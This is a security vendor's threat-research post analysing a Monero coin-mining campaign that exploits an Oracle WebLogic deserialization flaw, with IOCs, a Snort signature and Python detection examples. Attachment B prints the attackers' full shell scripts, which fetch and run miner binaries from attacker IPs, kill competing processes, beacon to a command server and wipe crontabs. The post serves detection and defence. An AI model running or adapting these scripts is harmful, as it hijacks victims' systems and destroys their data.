Coin Mining by Opportunistic and Automated Threats

January 12, 2018

By: Justin Warner
Tags: coin mining, Cryptocurrency, Threat Research

With the recent surge in popularity and increasing value of cryptocurrency, it should be no surprise that financially motivated threat actors have begun leveraging their victims to contribute to “mining” efforts, where the computing resources of the victim are used to generate cryptocurrency for the threat actor. To succeed in making a large profit, the actors must continually compromise a large number of victims and utilize significant computing resources. This demand for mass compromise has forced these threat actors to adopt automated methods that rely on opportunistic exploitation to outpace defenders, increasing the number of victims as quickly as possible with minimal cost.

While the business impact of coin mining seems minimal on the surface, having an unauthorized party in control of systems you own introduces a dangerous wild card. Is it really a criminal performing coin mining or is that a disguise? What will they do with the access if coin mining is no longer profitable? ICEBRG has witnessed incidents stemming from criminals who decided to sell their access to other parties, and the increasingly common malware-as-a-service scheme contributes to the risk from “simple” coin mining. Simply stated, criminal post-exploitation has become an efficient and widespread business that poses a threat to all enterprises, especially those with a significant and historical internet footprint that may contain undocumented or obsolete systems and pages. In this post, we will provide a walkthrough of an attack campaign that ICEBRG has witnessed in the wild over the past several weeks and break down some key lessons learned from the attack.

Attack Walkthrough

Exploitation

Attackers primarily rely on opportunistic exploitation of well-known (and signatured) vulnerabilities in applications running on internet-connected systems, and exhibit complete disregard for stealth or disguise. Throughout the recently observed campaign, attackers originating from multiple source addresses (191.101.180[.]84, 72.11.140[.]178) leveraged CVE-2017-10271, a Java deserialization vulnerability in the Oracle WebLogic Server, to target outdated servers (Figure 1). Java deserialization vulnerabilities are not unique to Oracle, and plague several older versions of WebSphere, JBoss, Jenkins, OpenNMS, etc. In this class of vulnerability, server software attempts to deserialize untrusted content without validation, allowing an attacker to abuse the application for code execution.

Figure 1: Connections from an external untrusted entity with suspicious referrer to an exposed vulnerable Oracle WebLogic endpoint

Tool Staging

Following exploitation of the system, the threat actor downloads and executes a shell script from their command and control (C2) server using Wget. Throughout the campaign, we observed several variations of the same tool (Figure 2), each progressively adding capabilities or cleanup mechanisms. This indicates the possibility that the tool is either a public script that is getting reused and built upon, or that this campaign is more far-reaching than ICEBRG has independently observed to this point.

| Identifier | Hosted URL | SHA1 Hash |
| --- | --- | --- |
| Version A | http://72.11.140[.]178/setup-watch | df62241026a96cda6057d894000de8ed70b3b666 |
| Version B | http://191.101.180[.]84:80/robots.txt | 4c3f1cc052f7216447df8954a55e373bdf2ecefc |

Figure 2: Versions of scripts seen by ICEBRG in recent campaigns

In Version B, ICEBRG observed that the script performs two major actions: cleanup and staging of tools. During the cleanup routine, the script makes extensive attempts to prevent multiplicative effects, killing active processes of previously running code, other coin miners on the system, or system utilities that might be used to detect the action. During the staging phase, the script runs two similar routines that download two different files from different URIs, set executable permissions, and attempt to execute the files. Both files are downloaded to the path ‘/tmp/xfsallocd’. The script sends a follow-on signal to the controller via an HTTP request from the download utility to a specific URI to indicate whether the file was already running or successfully started. Figure 3 shows the complete network staging process without the signal for successful execution. For a complete review of the source code, please reference Appendix B.

Figure 3: Complete staging process without execution signal
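The staging requests and the follow-on signal can be recovered from web proxy logs. The following is an added example, not ICEBRG code: it classifies a host's outbound requests using the download paths and `?info=` codes from the Appendix B scripts; the record layout, field names and the 203.0.113.10 / 10.0.5.x addresses are constructed.

```python
from urllib.parse import parse_qs, urlsplit

# Download paths and callback codes as they appear in the Appendix B scripts.
PAYLOAD_PATHS = {"/files/l/default": "default", "/files/l/others": "others"}
# l60/l30 are requested only after `$LFILE_PATH -B` exits successfully;
# l69/l39 are requested when `ps` already lists the miner's file name.
CALLBACKS = {
    "l60": ("default", "started"),
    "l69": ("default", "already_running"),
    "l30": ("others", "started"),
    "l39": ("others", "already_running"),
}
FETCH_TOOLS = ("wget", "curl")  # the two DOWNLOADER settings in the scripts


def classify(url):
    """Return (kind, variant, status) for a staging request, else None."""
    parts = urlsplit(url)
    if parts.path in PAYLOAD_PATHS:
        return ("payload", PAYLOAD_PATHS[parts.path], None)
    codes = parse_qs(parts.query).get("info", [])
    # Only the four codes seen in the scripts count; other ?info= values
    # are common in unrelated traffic.
    if parts.path in ("", "/") and codes and codes[0] in CALLBACKS:
        return ("callback",) + CALLBACKS[codes[0]]
    return None


def summarize(records):
    """Group staging requests by (client, server) and derive a verdict."""
    sessions = {}
    for rec in records:
        hit = classify(rec["url"])
        if hit is None:
            continue
        kind, variant, status = hit
        key = (rec["client"], urlsplit(rec["url"]).hostname)
        s = sessions.setdefault(
            key, {"payloads": [], "callbacks": [], "fetch_tool": False})
        if kind == "payload":
            s["payloads"].append(variant)
        else:
            s["callbacks"].append((variant, status))
        agent = rec.get("user_agent", "").lower()
        s["fetch_tool"] = s["fetch_tool"] or agent.startswith(FETCH_TOOLS)
    for s in sessions.values():
        # A callback means a miner process exists on the client. A payload
        # download with no callback means execution failed or the callback
        # was not logged; the host still needs triage.
        s["verdict"] = "miner_running" if s["callbacks"] else "payload_fetched"
    return sessions


# Constructed proxy records; 203.0.113.10 stands in for a staging server.
WGET = "Wget/1.12 (linux-gnu)"
SAMPLE = [
    {"client": "10.0.5.20", "url": "http://203.0.113.10/robots.txt", "user_agent": WGET},
    {"client": "10.0.5.20", "url": "http://203.0.113.10/files/l/default", "user_agent": WGET},
    {"client": "10.0.5.20", "url": "http://203.0.113.10/files/l/others", "user_agent": WGET},
    {"client": "10.0.5.20", "url": "http://203.0.113.10/?info=l30", "user_agent": WGET},
    {"client": "10.0.5.31", "url": "http://203.0.113.10/files/l/default", "user_agent": "curl/7.29.0"},
    {"client": "10.0.5.40", "url": "http://intranet.example/?info=weekly", "user_agent": "Mozilla/5.0"},
]

if __name__ == "__main__":
    for key, session in summarize(SAMPLE).items():
        print(key, session)
```

In the sample, 10.0.5.20 fetched both payloads and reported `l30`, which is the pattern left when the “default” binary fails to start and `DEFAULT || OTHERS` falls through to the second one.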

Profit

The executable binaries that are downloaded during staging are publicly known and identified Monero Coin Miners (Figure 4). Analysis of the binaries shows they are using the standard stratum connection string “stratum+tcp://pool.minexmr.com:80” with a wallet ID of “4AQe5sAFWZKECiaeNTt59LG7kVtqRoSRJMjrmQ6GiMFAeUvoL3MFeTE6zwwHkFPrAyNw2JHDxUSWL82RiZThPpk4SEg7Vqe”. Analysis of the wallet associated with this activity shows that the threat actor(s) have been paid out a total of 603.535663865 XMR, which, at the current exchange rate, equates to approximately $260,000 (note that, with cryptocurrency price fluctuations, this number is purely a point-in-time estimate).

| Download URI | Local File Name | SHA1 Hash |
| --- | --- | --- |
| $HOST/files/l/default | /tmp/xfsallocd, /tmp/watch-smartd | f79a2ba735a988fa6f65988e1f3d39684727bdc4 |
| $HOST/files/l/others | /tmp/xfsallocd, /tmp/watch-smartd | 7c57c61664f2b2373f755f22db9c156a1ca80849 |

Figure 4: Binaries that have been observed staging during the campaign

It is also worth noting that as of Jan 4, 2017, AlienVault published a signature to the public Emerging Threats feed (Figure 5) to identify activity with the associated wallet ID for this threat actor.

alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"ET CURRENT_EVENTS CoinMiner? Malicious Authline Seen After CVE-2017-10271 Exploit"; flow:established,to_server; content:"{|22|id|22 3A|"; depth:6; content:"|22|method|22 3a 20 22|mining.authorize|22 2c|"; within:100; content:"|22|params|22|"; within:50; content:"|5b 22|4AQe5sAFWZKECiaeNTt59LG7kVtqRoSRJMjrmQ6GiMFAeUvoL3MFeTE6zwwHkFPrAyNw2JHDxUSWL82RiZThPpk4SEg7Vqe|22 2c 20 22|"; distance:0; metadata: former_category CURRENT_EVENTS; reference:url,otx.alienvault.com/pulse/5a4e1c4993199b299f90a212; classtype:trojan-activity; sid:2025186; rev:1; metadata:attack_target Web_Server, deployment Datacenter, signature_severity Major, created_at 2018_01_04, malware_family CoinMiner?, performance_impact Low, updated_at 2018_01_04;)  

Figure 5: Emerging Threats Signature ID 2025186
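The signature in Figure 5 matches one byte layout of a `mining.authorize` request carrying one wallet. The following added example (not part of the ET rule set or ICEBRG's tooling) goes beyond it by parsing the JSON-RPC lines of a TCP payload, so that whitespace differences and other wallets are still reported. It also accepts the `login` request used by Monero miners such as XMRig; the worker-suffix handling and the sample payloads are assumptions constructed for the example.

```python
import json
import re

# Wallet ID reported in this post; extend with other wallets of interest.
WATCHED_WALLETS = {
    "4AQe5sAFWZKECiaeNTt59LG7kVtqRoSRJMjrmQ6GiMFAeUvoL3MFeTE6zwwHkFPrAyNw2JHDxUSWL82RiZThPpk4SEg7Vqe",
}
# Standard Monero address shape: 95 base58 characters beginning with "4".
XMR_ADDRESS = re.compile(r"4[1-9A-HJ-NP-Za-km-z]{94}")
# "mining.authorize" is what the signature matches; "login" is the
# equivalent request sent by Monero miners such as XMRig.
AUTH_METHODS = {"mining.authorize", "login"}


def account_of(message):
    """Return the account string of a stratum authorization, else None."""
    if not isinstance(message, dict):
        return None
    method = message.get("method")
    if not isinstance(method, str) or method not in AUTH_METHODS:
        return None
    params = message.get("params")
    if isinstance(params, list) and params and isinstance(params[0], str):
        return params[0]                      # ["<wallet>", "<password>"]
    if isinstance(params, dict) and isinstance(params.get("login"), str):
        return params["login"]                # {"login": "<wallet>", ...}
    return None


def inspect_payload(payload):
    """Scan one TCP payload (bytes) for stratum authorization requests."""
    findings = []
    for line in payload.splitlines():
        line = line.strip()
        if not line.startswith(b"{"):
            continue
        try:
            message = json.loads(line)
        except ValueError:                    # truncated or non-JSON data
            continue
        account = account_of(message)
        if account is None:
            continue
        # Assumption: drop an optional ".worker" or "+difficulty" suffix.
        wallet = re.split(r"[.+]", account, maxsplit=1)[0]
        if wallet in WATCHED_WALLETS:
            severity = "known_wallet"
        elif XMR_ADDRESS.fullmatch(wallet):
            severity = "monero_address"
        else:
            severity = "pool_login"
        findings.append({"method": message["method"], "wallet": wallet,
                         "severity": severity})
    return findings


def sample_payloads():
    """Constructed payloads: two authorizations, HTTP noise, a truncated line."""
    page_wallet = next(iter(WATCHED_WALLETS))
    other_wallet = "4" + "B" * 94             # constructed, not a real wallet
    return [
        json.dumps({"id": 1, "method": "mining.authorize",
                    "params": [page_wallet, "x"]}).encode() + b"\n",
        json.dumps({"id": 1, "jsonrpc": "2.0", "method": "login",
                    "params": {"login": other_wallet + ".rig01",
                               "pass": "x"}}).encode() + b"\n",
        b"GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n\r\n",
        b'{"id": 2, "method": "mining.author',
    ]


if __name__ == "__main__":
    for payload in sample_payloads():
        print(inspect_payload(payload))
```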

ICEBRG Analysis

As part of our investigations, ICEBRG analysts were able to identify additional related activity across our customer space and in the public domain. The primary points of pivot were signatures developed to match the Linux scripts, infrastructure analysis, open source intelligence gathering, and the wallet ID tied to the threat actor observed in the aforementioned campaign. By pivoting on these indicators, ICEBRG discovered the following:

  • Fourteen additional Linux shell script variants that had variations of the downloader string, host IP address, and coin miner file paths

  • Three variants of Windows PowerShell scripts that mirror the functionality of the observed Linux scripts

  • Two additional servers performing exploitation activity

  • Thirteen Windows XMRig coin miner variants customized for this campaign

All indicators discovered during this activity are provided and identified in Appendix A.

Lessons Learned

It is easy to look at this relatively simple activity and judge the attackers' tradecraft as almost too simple for an enterprise to be susceptible to. However, criminals are able to compromise a large number of victims and profit from the activity. The above illustrates once again that:

  • Visibility and knowledge of your internet footprint is vital

  • Multi-layered detection strategies provide a robust means to discover malicious activity

  • Forensics and root cause analysis are critical for long term continuity of business operations during incidents

Visibility and knowledge of your internet footprint is vital

If the successful exploitation of outdated and exposed assets provides the threat actor a form of revenue, it is likely they will continue to use these techniques. Knowledge of your asset inventory, application versioning, and attack surface will help you to better prevent, detect, and respond. In the case of many outdated or legacy *nix-based systems, it is unlikely that any sort of endpoint detection or response software will be supported, increasing the need for widespread network visibility and accountability over these endpoints.

Multi-layered detection strategies provide a robust means to discover malicious activity

Simply alerting on the IOCs provided in this post will serve as an initial layer of detection, but organizations should strive for more reliable indicators of malicious activity. In the case of this specific incident, there are numerous key detection points. Examples of these include:

  • Atomic Indicators: Threat intelligence matching on the servers, threat intel matching on the downloaded binaries, coin mining network activity, etc.

  • Complex Indicators: Executables downloaded with a suspicious user-agent, interaction with internet-exposed systems from “newly observed” low-reputation entities, executables downloaded immediately following an exploit attempt, etc.
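One way to combine the three complex indicators above into a single check, shown as an added example rather than ICEBRG's detection logic. The event fields, the time windows, the three-of-four threshold and all addresses are assumptions constructed for illustration.

```python
WINDOW_SECONDS = 120        # assumed: how soon a download must follow the inbound request
NEW_ENTITY_SECONDS = 86400  # assumed: a remote first seen under a day ago is "new"
ALERT_THRESHOLD = 3         # assumed: indicators that must agree before alerting
FETCH_TOOLS = ("wget", "curl")
EXECUTABLE_PREFIXES = (b"\x7fELF", b"MZ")  # ELF and PE file headers


def correlate(events, exposed_servers):
    """Flag outbound requests from exposed servers that stack several indicators."""
    first_seen = {}    # remote address -> first timestamp observed
    last_inbound = {}  # (server, remote) -> time of the latest inbound request
    alerts = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["dst"] in exposed_servers:        # inbound to an exposed server
            first_seen.setdefault(ev["src"], ev["ts"])
            last_inbound[(ev["dst"], ev["src"])] = ev["ts"]
            continue
        if ev["src"] not in exposed_servers:    # not traffic of interest
            continue
        server, remote = ev["src"], ev["dst"]   # outbound from the server
        first_seen.setdefault(remote, ev["ts"])
        reasons = []
        if ev.get("user_agent", "").lower().startswith(FETCH_TOOLS):
            reasons.append("fetch_tool_user_agent")
        if ev.get("body_prefix", b"").startswith(EXECUTABLE_PREFIXES):
            reasons.append("executable_content")
        seen = last_inbound.get((server, remote))
        if seen is not None and ev["ts"] - seen <= WINDOW_SECONDS:
            reasons.append("follows_inbound_from_same_remote")
        if ev["ts"] - first_seen[remote] <= NEW_ENTITY_SECONDS:
            reasons.append("newly_observed_remote")
        if len(reasons) >= ALERT_THRESHOLD:
            alerts.append({"ts": ev["ts"], "server": server,
                           "remote": remote, "reasons": reasons})
    return alerts


# Constructed events: timestamps in seconds, body_prefix = first response bytes.
EXPOSED = {"10.0.5.20", "10.0.5.21", "10.0.5.22"}
SAMPLE_EVENTS = [
    # Routine package update from a mirror the server has used for days.
    {"ts": 100, "src": "10.0.5.21", "dst": "198.51.100.7",
     "user_agent": "urlgrabber/3.10 yum/3.4.3", "body_prefix": b"<?xml"},
    # Inbound request from a new address, then tool downloads from it.
    {"ts": 200000, "src": "203.0.113.10", "dst": "10.0.5.20"},
    {"ts": 200003, "src": "10.0.5.20", "dst": "203.0.113.10",
     "user_agent": "Wget/1.12 (linux-gnu)", "body_prefix": b"export PATH="},
    {"ts": 200005, "src": "10.0.5.20", "dst": "203.0.113.10",
     "user_agent": "Wget/1.12 (linux-gnu)", "body_prefix": b"\x7fELF\x02\x01"},
    # Administrator fetching a binary from the long-known mirror.
    {"ts": 200500, "src": "10.0.5.21", "dst": "198.51.100.7",
     "user_agent": "curl/7.29.0", "body_prefix": b"\x7fELF\x02\x01"},
    # Ordinary visitor, followed by an unrelated API call by the application.
    {"ts": 200900, "src": "192.0.2.50", "dst": "10.0.5.22"},
    {"ts": 200910, "src": "10.0.5.22", "dst": "198.51.100.9",
     "user_agent": "Java/1.8.0_151", "body_prefix": b'{"status"'},
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS, EXPOSED):
        print(alert)
```

Only the two downloads by 10.0.5.20 alert: the shell script fetch on three indicators and the ELF download on all four, while the administrator's curl download from a long-known mirror stays below the threshold.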

Forensics and root cause analysis are critical for long term continuity of business operations during incidents

Even if successfully detected, a failure to contain or remediate the activity will likely lead to continued exploitation. In the case of interactive threat actors, an incomplete remediation will also provide a significant tip-off of your knowledge of their presence. Consider the scenario where you detect the activity, perform forensics to validate that no additional exploitation has occurred, and move to reimage the system for business continuity. Proper removal can be a time-consuming and intricate process that may be best handled by bringing in an Incident Response team to ensure complete remediation.


ICEBRG is a network security analytics company that offers a SaaS capability that enables customers to gain and utilize widespread network visibility for security operations. Our Security Research Team (SRT) researches and prototypes detection and investigation capabilities for the ICEBRG platform to deliver targeted insights into network threat activity to our customers.

As part of its research, ICEBRG coordinates disclosure of security threats and vulnerabilities with relevant parties in order to maximize both the response and victim remediation efforts as well as working to truly improve the security of customers and other victims prior to publishing blog posts. The aforementioned activity led to the discovery of technical intelligence and detection logic that is now contributing to the protection of all ICEBRG customers.

For additional information about this post or to learn more about how ICEBRG helps our customers defend against a wide range of threats, reach out to [email protected].


Attachment A: Indicators of Compromise

| Indicator | Type | Description |
| --- | --- | --- |
| 72.11.140[.]178 | IP Address | Server for exploitation and tool staging observed by ICEBRG |
| 72.11.140[.]179 | IP Address | Server for exploitation and tool staging identified via secondary analysis |
| 72.11.140[.]180 | IP Address | Server for exploitation and tool staging identified via secondary analysis |
| 191.101.180[.]84 | IP Address | Server for exploitation and tool staging identified via secondary analysis |
| /files/l/default | URI | URI of “default” coin mining malware |
| /files/l/others | URI | URI of “others” coin mining malware |
| carbon | Filename | Name of downloaded file, typically in /tmp or working dir |
| infoed | Filename | Name of downloaded file, typically in /tmp or working dir |
| ksxworker | Filename | Name of downloaded file, typically in /tmp or working dir |
| rcp_bh | Filename | Name of downloaded file, typically in /tmp or working dir |
| watch_smartd | Filename | Name of downloaded file, typically in /tmp or working dir |
| xfsallocd | Filename | Name of downloaded file, typically in /tmp or working dir |
| xlog-daemon | Filename | Name of downloaded file, typically in /tmp or working dir |

| Indicator | Type | Description |
| --- | --- | --- |
| auto-upgrade.exe | Filename | Windows filename for XMRig. Stored in path ‘$env:TMP’ |
| /files/w/default | URI | URI of hosted “default” XMRig binary for Windows |
| /files/w/others | URI | URI of hosted “other” XMRig binary for Windows |

Differential analysis of Linux shell scripts:

| SHA1 Hash | Downloader | Host | Local File |
| --- | --- | --- | --- |
| 9c2d266e880848a3f08dcceee0d27a660c521ac5 | curl | 72.11.140[.]178 | /tmp/rcp_bh |
| ca9fad2fe12b5231ae42f507afbb00a742b2e3d2 | wget -q -O - | 72.11.140[.]178 | /tmp/infoed |
| abc8be4e557107e80c1c342b7505dd3d2e47ef7f | wget -q -O - | 191.101.180[.]84 | `pwd`/xfsallocd, /tmp/xfsallocd |
| e843c894d837a41f5f9f2bcf932d1c5e49afe08b | wget -q -O - | 191.101.180[.]84 | `pwd`/xfsallocd, /tmp/xfsallocd |
| 07133903f1c38e653e39f9877dca9575699e807d | wget -q -O - | 72.11.140[.]178 | /tmp/carbon |
| 68039309925c8804fa745173cc8805938f3e3184 | curl | 72.11.140[.]178 | /tmp/infoed |
| 25c804e082a4adc01bfcbc19704f541c7026fa9b | wget -q -O - | 72.11.140[.]180 | `pwd`/xlog-daemon |
| 0b4f904cebd469abff43f0457ab6a77466453173 | wget -q -O - | 72.11.140[.]178 | /tmp/rcp_bh |
| c0b76bca13da6989f05c4aeac59029c3987d7f98 | wget -q -O - | 191.101.180[.]84 | `pwd`/xfsallocd, /tmp/xfsallocd |
| 3909125fd2ddca0aff8130115ef8b870e508e795 | curl | 191.101.180[.]84 | /tmp/xfsallocd |
| 348d1b3a54dc89250531258fe822e3a948dbc071 | wget -q -O - | 72.11.140[.]178 | `pwd`/rcp_bh |
| b4771410fe5bf3825df41735820aeaeff3c685bb | curl | 72.11.140[.]178 | /tmp/infoed |
| 13736cfc4df64a9890c4474f0003a54a8b72ffe2 | curl | 72.11.140[.]178 | `pwd`/rcp_bh |
| 5249dadfea25acaeb66a0f1798ac2f09a41f2449 | wget -q -O - | 72.11.140[.]179 | /tmp/ksxworker |
| df62241026a96cda6057d894000de8ed70b3b666 | wget -q -O - | 72.11.140[.]178 | /tmp/watch-smartd |
| 4c3f1cc052f7216447df8954a55e373bdf2ecefc | wget -q -O - | 191.101.180[.]84 | /tmp/xfsallocd |


Attachment B: Script Source Code

Version A

HOST=72.11.140.178
CALLBACK=$HOST
# DOWNLOADER="curl "
DOWNLOADER="wget -q -O - "
DEFAULT_RFILE=$HOST/files/l/default
OTHERS_RFILE=$HOST/files/l/others
LFILE_NAME="watch-smartd"
# LFILE_PATH=`pwd`/$LFILE_NAME
LFILE_PATH=/tmp/$LFILE_NAME

DEFAULT ()
{
 $DOWNLOADER $DEFAULT_RFILE > $LFILE_PATH
 chmod +x $LFILE_PATH
 ps -ef|grep $LFILE_NAME|grep -v grep
 if [ $? -ne 0 ]; then
   $LFILE_PATH -B && $DOWNLOADER "${CALLBACK}/?info=l60"
 else
   $DOWNLOADER "${CALLBACK}/?info=l69"
 fi
}

OTHERS ()
{
 $DOWNLOADER $OTHERS_RFILE > $LFILE_PATH
 chmod +x $LFILE_PATH
 ps -ef|grep $LFILE_NAME|grep -v grep
 if [ $? -ne 0 ]; then
   $LFILE_PATH -B && $DOWNLOADER "${CALLBACK}/?info=l30"
 else
   $DOWNLOADER "${CALLBACK}/?info=l39"
 fi
}

DEFAULT || OTHERS

Version B

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
HOST=191.101.180.84
CALLBACK=$HOST
# DOWNLOADER="curl "
DOWNLOADER="wget -q -O - "
LFILE_NAME="xfsallocd"
# LFILE_PATH=`pwd`/$LFILE_NAME
LFILE_PATH=/tmp/$LFILE_NAME
DEFAULT_RFILE=$HOST/files/l/default
OTHERS_RFILE=$HOST/files/l/others

CLEAN ()
{
 RMLIST=(/tmp/*index_bak* /tmp/*httpd.conf* /tmp/*httpd.conf /tmp/a7b104c270 /tmp/Carbon)
 KILIST=(sb1 wipefs AnXqV.yam [email protected] monerohash.com /tmp/a7b104c270 stratum.f2pool.com:8888 42HrCwmHSVyJSAQwn6Lifc3WWAWN56U8s2qAbm6BAagW6Ryh8JgWq8Q1JbZ8nXdcFVgnmAM3q86cm5y9xfmvV1ap6qVvmPe 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQt989KEfGRt6Ww2Xg8 46SDR76rJ2J6MtmP3ZZKi9cEA5RQCrYgag7La3CxEootQeAQULPE2CHJQ4MRZ5wZ1T73Kw6Kx4Lai2dFLAacjerbPzb5Ufg 42HrCwmHSVyJSAQwn6Lifc3WWAWN56U8s2qAbm6BAagW6Ryh8JgWq8Q1JbZ8nXdcFVgnmAM3q86cm5y9xfmvV1ap6qVvmPe xmrpool.eu mine.moneropool.com xmr.crypto-pool.fr:8080 xmr.crypto-pool.fr:3333 xmr.crypto-pool.fr:6666 xmr.crypto-pool.fr:7777 xmr.crypto-pool.fr:443)
 for item in ${RMLIST[@]}
 do
     rm -rf $item
 done
 for item in ${KILIST[@]}
 do
     ps auxf|grep -v grep|grep $item|awk '{print $2}'|xargs kill -9
 done
 days=$(($(date +%s) / 60 / 60 / 24))
 ps auxf|grep -v grep|grep "42HrCwmHSVyJSAQwn6Lifc3WWAWN56U8s2qAbm6BAagW6Ryh8JgWq8Q1JbZ8nXdcFVgnmAM3q86cm5y9xfmvV1ap6qVvmPe"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep ${days}|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "logind.conf"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "cryptonight"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "kworker"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "Silence"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "45hsTaSqTQM4K1Xeqkcy7eLzqdEuQ594fJVmQryCemQSCU878JGQdSDCxbhNyVjSkiaYat8yAfBuRTPSEUPZoARm9a5XEHZ"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "47sghzufGhJJDQEbScMCwVBimTuq6L5JiRixD8VeGbpjCTA12noXmi4ZyBZLc99e66NtnKff34fHsGRoyZk3ES1s1V4QVcB"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu1G7tDmShX1TSmgeJr2e9mCw2q1oHHTC2boHfjkJMzdxumM"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "t.sh"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "wipefs"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "carbon"|awk '{print $2}'|xargs kill -9
 pkill -f 49hNrEaSKAx5FD8PE49Wa3DqCRp2ELYg8dSuqsiyLdzSehFfyvk4gDfSjTrPtGapqcfPVvMtAirgDJYMvbRJipaeTbzPQu4
 pkill -f 4AniF816tMCNedhQ4J3ccJayyL5ZvgnqQ4X9bK7qv4ZG3QmUfB9tkHk7HyEhh5HW6hCMSw5vtMkj6jSYcuhQTAR1Sbo15gB
 pkill -f 4813za7ePRV5TBce3NrSrugPPJTMFJmEMR9qiWn2Sx49JiZE14AmgRDXtvM1VFhqwG99Kcs9TfgzejAzT9Spm5ga5dkh8df
 pkill -f cpuloadtest
 pkill -f crypto-pool
 pkill -f xmr
 pkill -f prohash
 pkill -f monero
 pkill -f miner
 pkill -f nanopool
 pkill -f minergate
 pkill -f yam
 pkill -f Silence
 pkill -f yam2
 pkill -f minerd
 pkill -f Circle_MI.png
 pkill -f curl
 ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "crypto-pool"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "prohash"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "monero"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "miner"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "nanopool"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "minergate"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:3333"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:443"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "[email protected]"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "44pgg5mYVH6Gnc7gKfWGPR2CxfQLhwdrCPJGzLonwrSt5CKSeEy6izyjEnRn114HTU7AWFTp1SMZ6eqQfvrdeGWzUdrADDu"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "42HrCwmHSVyJSAQwn6Lifc3WWAWN56U8s2qAbm6BAagW6Ryh8JgWq8Q1JbZ8nXdcFVgnmAM3q86cm5y9xfmvV1ap6qVvmPe"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "49JsSwt7MsH5m8DPRHXFSEit9ZTWZCbWwS7QSMUTcVuCgwAU24gni1ydnHdrT9QMibLtZ3spC7PjmEyUSypnmtAG7pyys7F"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "479MD1Emw69idbVNKPtigbej7x1ZwFR1G3boyXUFfAB89uk2AztaMdWVd6NzCTfZVpDReKEAsVVBwYpTG8fsRK3X17jcDKm"|awk '{print $2}'|xargs kill -9
 ps auxf|grep -v grep|grep "11231"|awk '{print $2}'|xargs kill -9
}

DEFAULT ()
{
 $DOWNLOADER $DEFAULT_RFILE > $LFILE_PATH
 chmod +x $LFILE_PATH
 ps -ef|grep $LFILE_NAME|grep -v grep
 if [ $? -ne 0 ]; then
   $LFILE_PATH -B && $DOWNLOADER "${CALLBACK}/?info=l60"
 else
   $DOWNLOADER "${CALLBACK}/?info=l69"
 fi
}

OTHERS ()
{
 $DOWNLOADER $OTHERS_RFILE > $LFILE_PATH
 chmod +x $LFILE_PATH
 ps -ef|grep $LFILE_NAME|grep -v grep
 if [ $? -ne 0 ]; then
   $LFILE_PATH -B && $DOWNLOADER "${CALLBACK}/?info=l30"
 else
   $DOWNLOADER "${CALLBACK}/?info=l39"
 fi
}

CLEAN
DEFAULT || OTHERS
crontab -r